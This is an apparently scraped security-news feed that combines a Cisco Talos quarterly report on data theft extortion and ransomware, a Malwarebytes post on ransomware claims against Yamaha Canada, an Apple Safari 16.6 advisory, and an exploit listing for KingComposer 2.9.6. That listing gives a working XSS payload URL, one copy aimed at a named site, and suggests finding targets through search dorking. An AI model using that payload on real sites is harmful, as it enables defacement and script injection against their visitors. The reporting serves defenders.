NxmkZRAAjjxwr78rla+am6CeQzC7jrb5mJPfrgSv4AYzFxicpRPdgS1Ccq4g4//i  
mEBcguqRuxmalSzHNgzRRFpynHaOri5d0YIoersRkDAtzzOAyAF81sszYL0vxxJo  
9vDpuLfbehX5xsHN8K0owJwFAmLAMiCJrWlAOYlxEsiERszr3cC8rmX5pYgenWFZ  
N9HM5vP/l7HLDdLEdGEympiofQ/GJAL85ZxV8cXKUhCHdymaAv+vE9yUBO1PrZVA  
T9K5BLmwP0jPe8GrvzQqYtvC5LWn1MzMV9bOj/M2yZ98TYn+pZZkrF1LJbiW+qHz  
xj2DEgqosTrTERbbHp4WkI+4Q8iCMgB2x1b2z1Ro/rck58yabb5IweWBjnwdyBXK  
lba6siFP3hhwCwvdx06Dgv4hzPQw6Rz5s9ZEToqVyxaq68gRqCWgI8u6A69th73J  
oqxbcwuz7cIWokvDHYn66BD9+R6jXtcKt1Ina6SKsIeIC2sG3keOlC5mTvgPbaaS  
IEeaO7NdkDAEdD3VWhDuB6nR2womKMJufcOwcwE0CD9HDxOruCt4ty9AX12R9N26  
9y/9KoF5VzyJh+YEU0G0moj0b+ugu4E8FziVsb5z+CxPt0KZs9SgU3dIIaneo/yB  
8UeZq3pAeIzBZkANlYYXhMOk7Bd5yA/8eYwfS6HxeG9OIM6a1V4=  
=moFJ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-4

Ransomware was the second most-observed threat this quarter, accounting for 17 percent of engagements, a slight increase from last quarter’s 10 percent.

Wednesday, July 26, 2023 08:07

Cisco Talos Incident Response (Talos IR) responded to a growing number of data theft extortion incidents that did not involve encrypting files or deploying ransomware, a 25 percent increase since last quarter and the most-observed threat in the second quarter of 2023.

In this type of attack, threat actors steal victim data and threaten to leak or sell it unless the victim pays varying sums of money, eliminating the need to deploy ransomware or encrypt data. This differs from the double-extortion ransomware method, whereby adversaries exfiltrate and encrypt files and demand payment for victims to receive a decryption key.

Ransomware was the second most-observed threat this quarter, accounting for 17 percent of engagements, a slight increase from last quarter’s 10 percent. This quarter featured the LockBit and Royal ransomware families, which Talos IR has observed in previous quarters. Talos IR also observed several ransomware families for the first time, including 8Base and MoneyMessage.

Compromised credentials or valid accounts were the top observed means of gaining initial access this quarter, accounting for nearly 40 percent of total engagements. It was challenging to identify how the credentials were compromised considering they were obtained from devices outside the company’s visibility, such as saved credentials on an employee’s personal device.

Continuing the trend from last quarter, healthcare was the most targeted vertical this quarter, making up 22 percent of the total number of incident response engagements, closely followed by financial services.

**Data theft extortion on the rise, featuring Clop, Karakurt and RansomHouse**

Data theft extortion was the top observed threat this quarter, accounting for 30 percent of threats Talos IR responded to, a 25 percent increase in data theft extortion incidents compared to last quarter. The rise in data theft extortion incidents compared to previous quarters is consistent with public reporting on a growing number of ransomware groups stealing data and extorting victims without encrypting files and deploying ransomware.

Data theft extortion is not a new phenomenon, but the number of incidents this quarter suggests that financially motivated threat actors are increasingly seeing this as a viable means of receiving a final payout. Carrying out ransomware attacks is likely becoming more challenging due to global law enforcement and industry disruption efforts, as well as the implementation of defenses such as increased behavioral detection capabilities and endpoint detection and response (EDR) solutions.

This quarter featured activity from the RansomHouse and Karakurt extortion groups for the first time in Talos IR engagements. Active since 2021, Karakurt typically gains access to environments via valid accounts, phishing, or exploiting vulnerabilities. In one observed Karakurt data theft extortion engagement, the attackers hijacked a remote desktop protocol (RDP) account, enumerated domain trusts using the network administration command-line tool nltest, executed PowerShell scripts to recover passwords, and modified domain policies.

RansomHouse has been active since late 2021 and is known for gaining access to corporate environments by exploiting vulnerabilities. In a RansomHouse engagement, the adversaries used non-interactive sessions to bypass multi-factor authentication (MFA), carried out a DCSync attack to collect credentials from a domain controller, and abused remote services such as secure shell (SSH) and RDP to move laterally. A DCSync attack occurs when attackers use various commands in Microsoft Directory Replication Service (DRS) Remote Protocol to masquerade as a domain controller to acquire user credentials from another domain controller. An attacker first needs to compromise a user account with domain replication privileges, which are typically domain admins.

Some ransomware groups, such as BianLian and Clop, are reportedly shifting away from using encryption, favoring data theft extortion in recent attacks, according to public reporting. Although Talos IR did not respond to any BianLian incidents this quarter, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) published a joint advisory on May 16 with the FBI and the Australian Cyber Security Centre (ACSC) confirming that as of January, the BianLian group stopped conducting ransomware operations in favor of performing exfiltration-based data theft extortion. BianLian group’s shift from deploying ransomware may also be due to the release of a free decrypter for BianLian ransomware in January 2023, possibly prompting them to pursue alternate methods. It is possible BianLian determined they could be successful without the use of data encryption in their operations.

Active since February 2019, the Clop group started as a ransomware-as-a-service (RaaS) operation with an affiliate program that relied on the double extortion technique involving stealing and encrypting data. With the rise in data theft extortion incidents this quarter, it is possible the trend will continue, with other groups who primarily deploy ransomware shifting to data theft extortion as a primary means of receiving a payout.  

In a Clop data theft extortion engagement this quarter, the adversaries gained initial access by exploiting a zero-day remote code execution (RCE) vulnerability in the Forta GoAnywhere managed file transfer (MFT) application, tracked as CVE-2023-0669. Notably, the affiliate did not deploy ransomware and only conducted data theft extortion upon exfiltrating victim information. The Clop ransomware group has a history of mass exploitation of zero-day vulnerabilities in campaigns targeting file transfer applications, affecting hundreds of companies globally. This includes several zero-day vulnerabilities in the Kiteworks, formerly Accellion, file transfer application (FTA), tracked as CVE-2021-27101, CVE-2021-27102, CVE-2021-207103, and CVE-2021-27104, and a SQL injection vulnerability in the Progress Software’s MFT application known as MOVEit Transfer, tracked as CVE-2023-34362. U.S. law enforcement has taken notice and increased pressure on the group, offering a $10 million dollar reward for information on the identification or location of Clop members.

It is highly unusual for a ransomware group to consistently exploit zero-day vulnerabilities, given the resources required to develop such exploits, possibly suggesting that the Clop ransomware group possesses a level of sophistication and funding matched only by advanced persistent threats (APTs). Given the group’s incorporation of zero-days in MFT applications in recent attacks, and the group’s perceived success in affecting hundreds of organizations, Clop is likely to target MFT applications in the future.

**Ransomware**

Ransomware accounted for 17 percent of the total number of engagements responded to in Q2 2023 (April - June), a slight increase compared to 10 percent last quarter. 8Base and MoneyMessage ransomware operations were observed for the first time this quarter, in addition to the previously seen ransomware operations LockBit and Royal.

First discovered in March 2022, 8Base is a ransomware group/operation that uses a customized version of Phobos ransomware and steals data prior to encryption. Although the group has been around for over a year, it started gaining increasing popularity in June 2023 after a significant spike in activity.

In an 8Base ransomware engagement, the legitimate remote desktop application AnyDesk was installed in the Performance Logs (Perflogs) directory, potentially as a way to evade detection. The Perflogs folder is a system-generated folder that stores information about the performance of the device. The attackers were also observed dumping credentials from the Local Security Authority Subsystem Service (LSASS) memory, creating new processes with an existing user token to bypass access controls, escalating privileges using the runas command, and using the Windows command shell to execute PowerShell scripts.

MoneyMessage is a fairly new ransomware operation that was first discovered in March 2023. Similar to 8Base, the MoneyMessage ransomware group operates under the double-extortion model. MoneyMessage is a ransomware family written in the C++ programming language and uses the Elliptic Curve Diffie-Hellman (ECDH) key exchange and ChaCha stream cipher algorithm for encryption, both of which are commonly used by ransomware families.

Talos IR responded to a MoneyMessage ransomware attack where the MoneyMessage encryptor was dropped in the Netlogon directory allowing for the deployment of the ransomware to multiple hosts. Prior to executing ransomware, the attackers also uninstalled various security tools, such as EDR solutions, via PowerShell scripts to impair defenses.

**Initial vectors**

In the majority of the engagements Talos IR responded to this quarter, adversaries gained initial access by abusing compromised credentials to access valid accounts. The use of valid accounts was observed in nearly 40 percent of the total engagements, a 22 percent increase from Q1 2023.  

It is difficult to say how adversaries obtained the compromised credentials used to access valid accounts. There are a number of ways credentials can become compromised, such as third-party data breaches, information-stealing malware such as Redline, and phishing campaigns. This is especially true if employees reuse credentials across multiple accounts, highlighting the importance of using strong password policies and enabling MFA across critical servers.

**Security weaknesses**

A lack of MFA or improper MFA implementation across critical services played a part in over 40 percent of the engagements Talos IR responded to this quarter. Talos IR frequently observes attacks that could have been prevented if MFA was enabled on critical services, such as VPNs. In nearly 40 percent of engagements, attackers were able to abuse compromised credentials to access valid accounts, 90 percent of which did not have MFA enabled. In some engagements, adversaries were able to bypass MFA with MFA exhaustion/fatigue attacks.

MFA exhaustion attacks occur when an attacker attempts to repeatedly authenticate to a user account with valid credentials to overwhelm victims with MFA push notifications, hoping they will eventually accept, allowing the attacker to successfully authenticate into the account. Identification and user education are key parts of countering MFA bypass techniques. Organizations should ensure employees are aware of who to contact in these situations to determine if the event was a technical issue or malicious in nature.

Talos IR recommends disabling VPN access for all accounts that do not have MFA enabled. Additionally, Talos IR recommends expanding MFA for all user accounts (e.g., employees, contractors, business partners, etc.). Talos IR has repeatedly seen attackers targeting vendor and contractor accounts (VCAs), which typically have expanded privileges and access. VCAs are often overlooked during account audits due to trust placed in the third party, making them an easy target for attackers. Talos IR recommends disabling VCAs when they are not needed, implementing least privilege access, and validating that logging and security monitoring are enabled for VCA accounts.

Talos IR also recommends organizations perform a password audit across all user and service accounts to ensure complexity and strength are aligned with the industry best practices per account type (e.g., privilege, service, user, etc.) to prevent password enumeration techniques, such as password spraying.

**Top-observed MITRE ATT&CK techniques**

The table below represents the MITRE ATT&CK techniques observed in this quarter’s IR engagements, which includes relevant examples and the amount Talos IR saw in engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note this is not an exhaustive list.

**Key findings from the MITRE ATT&CK framework include:**

*   The use of valid accounts was the top observed initial access technique, accounting for nearly 40 percent of the total number of engagements.
*   Observed in over 50 percent of engagements this quarter, PowerShell is a dynamic command line utility that continues to be a popular utility of choice for adversaries likely for a number of reasons including stealth, convenience and vast IT administration capabilities.
*   In 26 percent of engagements this quarter, Talos IR observed attackers abusing remote services, such as RDP and SSH, to facilitate lateral movement.
*   The top persistence mechanism observed this quarter was the abuse of Windows Task Scheduler to create scheduled tasks, allowing adversaries to execute programs or commands at scheduled times or at system startup.

Tactic

Technique

Example

Initial Access (TA0001)

T1078 Valid Accounts

Adversary leveraged stolen or compromised credentials. 

Execution (TA0002)

T1059.001 Command and Scripting Interpreter: PowerShell

Executes PowerShell code to retrieve information about the client’s Active Directory environment.

Persistence (TA0003)

T1053.005 Scheduled Task/Job: Scheduled Task

Scheduled tasks were created on a compromised server to execute malware during startup.

Defense Evasion (TA0005)

T1562.001 Impair Defenses: Disable or Modify Tools

Uninstall security tools to evade detection.

Credential Access (TA0006)

T1003.006 OS Credential Dumping: DCSync

Use DCSync attack to gather credentials for privilege escalation routines.

Lateral Movement (TA0008) 

T1563.002 Remote Services Session: RDP Hijacking

Adversary compromised an existing user’s Remote Desktop Protocol session.

Impact (TA0040)

T1486 Data Encrypted for Impact

Deploy ransomware and encrypt critical systems.

Software/Tool

S0359 Nltest

Enumerate remote domain controllers with Nltest.

Data theft extortion rises, while healthcare is still most-targeted vertical in Talos IR engagements

Categories: Business
Tags: ransomware

Tags:  blackbyte

Tags:  Akira

Tags:  group

Tags:  compromised

Tags:  data

Tags:  blackmail

Tags:  extortion

Tags:  attack

Tags:  Yamaha

Tags:  Canada

Tags:  music

Tags:  audio

We take a look at claims that Yamaha has been compromised by two unrelated ransomware groups.



(Read more...)




The post Ransomware groups claim responsibility for double-attack on Yamaha appeared first on Malwarebytes Labs.

Music giant Yamaha’s Canadian division has experienced a compromise on two different fronts, both related to ransomware. In an attack which has worrying echoes of the recent Estée Lauder attack, multiple attackers have claimed to breach the organisation.

Yamaha Canada Music had the following to say in a statement:

> Yamaha Canada Music Ltd. recently encountered a cyberattack that led to unauthorized access and data theft. In response, we swiftly implemented measures to contain the attack and collaborated with external specialists and our IT team to prevent significant damage or malware infiltration into our network.
> 
> Yamaha Canada has been notifying affected individuals, and we are offering credit monitoring services to those at risk of potential harm. Additionally, we have taken decisive actions to reinforce our network defenses and ensure enhanced security measures moving forward.

Note that, as with the Estée Lauder incident(s), no specific ransomware group is cited as having been responsible for the attack in question. Despite this, we have two groups claiming to have been involved in data exfiltration.

This time around, the groups claiming responsibility are Black Byte and Akira ransomware. The BlackByte claim was noticed by researcher Dominic Alvieri on June 14, with a follow up post to confirm Akira’s claim July 21.

The Record article notes that several “double-hitter” attacks have been made public recently, and the question of whether or not this is by accident or design is raised once more. One proposed theory is that it could be down to affiliates working on behalf of several groups. Another is that groups are simply working together to reap the rewards, and perhaps make the attacks even more visible to the public.

Whatever the reason, it just means more work and more potential headaches for the organisations being targeted.

Akira has appeared in a few of our Ransomware Reviews, beginning in May of this year, and is typically found in the top half of our most active gang chart. From our post:

> Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing. When executed, the ransomware deletes Windows Shadow Volume Copies, encrypts files with specific extensions, and appends the .akira extension to the encrypted files.
> 
> Like most ransomware gangs these days, the Akira gang steals corporate data before encrypting files for the purposes of double-extortion. So far, the leaked info published on their leak site—which looks retro and lets you navigate with typed commands—ranges from 5.9 GB to a whopping 259 GB.
> 
> Akira demands ransoms from $200,000 to millions of dollars, and it seems they are willing to lower ransom demands for companies that only want to prevent the leaking of stolen data without needing a decryptor.

BlackByte, a ransomware as a service (RaaS) tool, is another frequent appearance in our top ransomware gang lists. BlackByte has scored some notable attacks, with one of the biggest being the compromise of the San Francisco 49ers shortly before the 2022 Super Bowl.

As with all of these attacks, it remains to be seen whether any data will be leaked or sold on. For now, organisations large and small will have to try and weather the storm of simultaneous single, double, or even triple threat attacks.

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR remove all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware groups claim responsibility for double-attack on Yamaha

Apple Security Advisory 2023-07-24-1 - Safari 16.6 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-1 Safari 16.6

Safari 16.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213847.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, and Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit Process Model  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 258100  
CVE-2023-38597: 이준성(Junsung Lee) of Cross Republic

WebKit Web Inspector  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Additional recognition

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

Safari 16.6 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLUACgkQ4RjMIDke  
NxmswA/+Ogpb238ypqmIxTWos/b/TTV2uTnDHQHuKGVBMiVy0Rh+3Cnu2GTTSLiC  
bYh2hWCXP3jarhE3/dosv7AhtYvDHYgh0fCbVCRn43rTGVMpJGSAZ3NzyfD76fPQ  
4XlaGZuf9326GGXq9lY00Ga98zA0Hf40JJzVpYXgoLopmVml8lgRyJSN1EVjXPJR  
fKJSe0y/aKHmH1qAIyVG4Q0qMVTamRCUmZwSp++UZ/gwg2E3qBTT30voPmvw1onW  
uRMdUXyh+K74/O7nan6P5z/WHuUAdRX6Hpjr7IvNcasm/KPEBOfj4lx1YwWJ592E  
F0o+d2k7awPElXMfsGTewW1HynJuis57AN808XOYjBCd+pKKlQq6NdKun87d3zxr  
RjmDdh4Yoqs3aaDckRYk8arq4g0/mKn9wSiVXwvoYC5YBePR8CQxzdP98gAqhjQM  
y9w1xPyb0Y5qCNPhPw4dk7OSrLI3y8Z+BWdMc/TIO+GOHYMdM4BtUoZ/M5T3Nqgb  
++EAggF5ajSJXmHNEVS5zLDcuP+HSYqQphqc8y6WMmWHM8tLA53OWiTDMSHP5n0x  
OFdgAYgegvc2dDbhDjVMAaVJuWqMKtsnIO//1+9ffBk4QSkQUZwGk3ybO+r27V4a  
1NzO/xMvepp/ZHj+R7j+bE4KVw6bPX43agaE+00WMMx+TqVXa4c=  
=RW2J  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-1

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

Posted Jul 25, 2023

Authored by indoushka

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 13a1ca560e74613eb2d4517f0addb6da665a264ecdfd2a0a3388354bd3480ea9

Download | Favorite | View

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.6 XSS Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://visitsafinet/wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,749)
*   Arbitrary (16,156)
*   BBS (2,859)
*   Bypass (1,735)
*   CGI (1,025)
*   Code Execution (7,240)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,335)
*   DoS (23,366)
*   Encryption (2,365)
*   Exploit (51,659)
*   File Inclusion (4,213)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,756)
*   Intrusion Detection (891)
*   Java (3,036)
*   JavaScript (851)
*   Kernel (6,644)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,139)
*   Proof of Concept (2,338)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,674)
*   Root (3,576)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,877)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,312)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,716)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,879)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,995)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,794)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,251)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,603)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,760)
*   UNIX (9,270)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Tag

#cisco